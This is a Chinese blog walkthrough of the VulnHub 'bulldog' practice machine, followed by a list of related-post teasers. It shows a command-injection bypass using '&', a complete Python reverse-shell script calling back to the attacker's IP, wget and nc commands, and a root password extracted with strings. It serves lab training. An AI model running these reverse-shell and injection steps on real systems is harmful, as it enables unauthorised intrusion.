【Vulnhub系列】bulldog

已于 2023-06-21 21:36:36 修改
阅读量1.8k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: # VulnHub 文章标签: Vulnhub 网络安全
于 2018-09-27 21:55:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/82869414
本文通过攻破斗牛犬靶机的过程,详细介绍了使用dirb进行目录挖掘、Linux命令组合技巧、Python搭建HTTP服务器及反弹shell脚本的运用,最终实现提权至root并读取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

===========================

个人收获:

1.dirb挖掘网页目录

2.Linux 可以用&同时执行多条命令

3.Kali利用Python搭建简单HTTP服务器

4.python写的shell反弹脚本

5.利用python pty模块的shell来进行交互

============================

下载地址:https://download.vulnhub.com/bulldog/bulldog.ova

靶机说明

斗牛犬工业公司最近将其网站污损,并由恶意德国牧羊犬黑客团队拥有。这是否意味着有更多的漏洞可以利用?你为什么不知道?:)

这是标准的Boot-to-Root。你唯一的目标是进入根目录并看到祝贺信息,你怎么做取决于你!

难度:初学者/中级,如果遇到困难,试着找出你可以与系统交互的所有不同方式。这是我唯一的暗示;)

目标

  • 提权到root权限并查看flag

运行环境

如果把靶机运行在VM下可能会出现一些问题,获取不了IP,需要自己在LINUX恢复模式下调试靶机比较麻烦。

这里我把     靶机运行在Vritual box   Kali运行在VM

 由于自身环境的原因不想弄乱自己的VM环境

我把靶机的网卡设置为Host-only   然后VM里面的桥接模式网卡设置为Vritual box的Host-only。

这样VM设置为桥接模式就能跟靶机在一个局域网下

下面是我靶机和Kali 的IP

Kali:192.168.56.102

bulldog:192.168.56.101

1.信息收集

主机探测

可以用    nmap -sS 192.168.43.0/24 进行

然后进行服务识别

nmap -A -p 80,23 192.168.56.101

发现ssh服务和web服务,并且web服务为python。

然后对web进行目录挖掘

发现 /admin  /dev

打开/admin尝试注入失败

查看/dev/shell发现webshell不能使用

我们查看/dev的源码出现线索

然后我们上MD5免费在线解密破解_MD5在线加密-SOMD5对这里面的MD5进行破解

这里我们选择sarah进行登陆

登陆进去后使用web-shell

这里给我们6个可用的命令,执行其他的命令会被拦截,这里我们用&进行命令组合绕过

然后我们在自己的Kali上用python搭建一个简单HTTP服务器,然靶机下载一个python写的shell反弹脚本

python -m SimpleHTTPServer 80

shell脚本源码:

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.56.102",1234))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/bash","-i"])

然后把文件放到网站目录下(自己的家目录)

然后在web-shell执行以下命令

pwd&wget http://192.168.56.102/python-shell.py

然后我们在Kali上执行

nc -lvp 1234

然后在web-shell上执行反弹脚本

pwd&python python-shell.py

这个时候kali会得到一个shell

然后我们切换目录到 bulldogadmin   

这里如果觉得shell命令的显示模式比较难受 可以在xshell下面的cmd栏目里面输入

进入bulldogadmin的家目录后 输入 

ls -la  查看全部文件(包括隐藏文件)

发现一个.hiddenadmindirectory

然后我们cd 进入 查看有什么东西

利用string查看可执行文件中的字符

<gadmin/.hiddenadmindirectory$ strings customPermissionApp                   
/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
  Usage: ./customPermissionApp <username>
sudo su root
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
customPermissionApp.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

从以上字符大概知道程序的用途

从里面分析出,这个大概是密码

注意每一段后面的H不是密码 需要去除

密码:SUPERultimatePASSWORDyouCANTget

然后执行python shell

sudo python -c 'import pty; pty.spawn("/bin/bash")' 

然后输入获得的密码,并切换到root的目录下,

最后 读取flag文件

(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 440
Bulldog1渗透实战 文章转载 靶机渗透测试实战(三)——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldog主机ip ​ 【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
vulnhub渗透系列bulldog
来到了学渣的博客
01-20 1740
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结: 1. 对端口信息扫描、信息的收集 2. 用dirb扫出了许多关键目录 3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息 4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞 5. 搭建临时...
[网安靶场] 红队综合渗透靶场 —— VulnHub · 靶场笔记合集
最新发布
Blue17 の 小窝
05-16 572
VulnHub 平台目前由 Kali Linux 的开发团队 Offsec 维护,内部拥有超过 600 个镜像,且所有资源免费下载,帮助用户在合法环境中模拟真实攻击链,提升实战能力。VulnHub 是一个专注于网络安全实战训练的靶场平台,平台内提供了大量预置漏洞的虚拟机镜像,供安全爱好者学习渗透测试技术。VulnHub —— Breach : 1 —— 🚩 Tomcat 后台入侵 + 数据库信息收集 + Sudo & 定时任务提权。0x01:VulnHub —— 靶场初识。
vulnhub bulldog
dfhjlll的博客
02-11 359
配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter kali在VMware下运行,设置成桥接模式 打开,查看ip :192.168.56.102 使用...
bulldog-vulnhub
weixin_43841336的博客
07-18 201
1.nmap扫描存活主机,找到靶机(192.168.34.160) 2.nmap -sV -p0-65535 -T4扫描开放端口 80端口和8080端口一样, 3.用dirb扫描一下 访问/dev 下面有个web-shell进去以后需要登陆 打开源码邮件后面都有MD5加密后的字符串,解密ddf45997a7e18a25ad5f5cf222da64814dd060d5为bulldog,账号为nic...
Vulnhub--bulldog
Oavinci的博客
04-01 277
配置: VirtualBox运行靶机bulldog,网卡设置为Host-only; VMware下运行kali作为攻击机,网卡设置为桥接模式Vritual box Host-only Kali:192.168.56.102 bulldog:192.168.56.103 netdiscover -r 192.168.56.0/24 发现靶机IP:192.168.56.103 nmap -T4 -A -v -p- 192.168.56.103 开放了23、80、...
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
vulnhub】---bulldog靶机
qq_43168364的博客
08-21 431
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、信息收集 主机发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
VulnHub 靶机学习No.6 Bulldog
gh0stf1re的博客
10-03 356
本篇博客的主要内容VulnHub 靶机学习No.6 Bulldog靶机运行说明信息收集利用 bash 弹shell提权知识点总结参考链接: VulnHub 靶机学习No.6 Bulldog 靶机运行说明 靶机难度:初级至中级 攻击机:kali linux,ip地址:192.168.56.102 靶机:DC-4,IP地址:192.168.56.101 目标:找到终极flag 信息收集 BullDog 靶机直接显示了IP地址:192.168.56.101 使用 nmap 对其进行全端口扫描 nmap -s
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
热门推荐
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1528
Vulnhub-Bulldog靶机实战
【渗透测试】靶机渗透Vulnhub-bulldog
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
06-01 3846
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 562
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试 信
vuInhub靶场实战系列--bulldog-1
weixin_45221204的博客
06-03 1883
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
qq_45722813的博客
11-15 2788
Vulnhub靶场渗透测试系列-bulldog 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址 这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置 https://blog.csdn.net/qq_45722813/article/details/121324686 得到靶机IP地
vulnhubbulldog 1实战攻略
weixin_43862283的博客
04-15 588
vulnhubbulldog 1实战攻略 0x01 环境配置 bulldg 1 难度:初学者 目标:提权到root权限并查看flag 攻击机:kali linux,IP地址192.168.34.179 靶机: bulldog,IP地址192.168.34.160(桥接模式) 下载地址:https://www.dropbox.com/s/ygzfkfhyatbfybr/bulldog.ova?dl...
靶机实战-bulldog1
滕财然的博客
01-19 1115
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 835
这个靶机难度较为简单,可以简单练手
vulnhub-bulldog2靶机渗透扫描不出靶机ip
04-03
### 关于VulnHub Bulldog2靶机无法扫描到IP的解决方案 在渗透测试过程中,如果遇到无法通过常规手段扫描到目标主机的情况,可以尝试多种技术组合来定位目标主机。以下是针对此问题的具体分析和建议: #### 使用ARP扫描工具 当标准的`ping`或`nmap`扫描未能发现目标主机时,可以通过局域网内的ARP广播请求找到活动设备。例如,在引用中提到的方法3使用了`netdiscover`命令[^3]: ```bash netdiscover -r 192.168.44.0/24 -i eth0 ``` 上述命令会向指定子网发送ARP请求并监听响应,从而识别出网络中的活跃主机。 #### 调整Nmap参数优化扫描效果 除了传统的ICMP Ping外,还可以利用TCP SYN包或其他协议类型的探测方式提高成功率。比如下面这条指令包含了服务版本检测(-sV),隐秘模式(SYN半开扫描-sS)以及调整时间模板至更快执行速度(T4)[^2]: ```bash nmap -sS -sV -T4 192.168.11.19 ``` 另外值得注意的是,有时防火墙可能阻止来自外部源地址的数据包进入内部网络;因此有必要确认Kali Linux所在环境与Bulldog2 VM之间确实处于同一物理或者逻辑二层交换结构下(即两者能够互相访问对方MAC层面的信息). #### 测试Telnet/TCP连接验证特定端口状态 即使整体Ping不通某个节点,但如果已知其开放的服务端口号,则可以直接发起相应层次上的握手过程来进行判断是否存在可交互对象。正如材料里所描述那样,“尝试远程连接23端口后失败。”这表明虽然telnet未成功建立session,但仍不失为一种排查思路之一[^1]. 综上所述,对于找不到vulnhub bulldog2 IP这一难题,可以从多个角度出发寻找突破口:一方面借助专门设计用于本地网段探索的应用程序如NetDiscover;另一方面灵活运用高级配置选项丰富的侦查利器-NMAP,并辅以其他辅助性操作进一步缩小范围直至最终锁定确切位置。 ```python import os def scan_network(): command = 'netdiscover -r 192.168.44.0/24 -i eth0' result = os.popen(command).read() print(result) scan_network() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值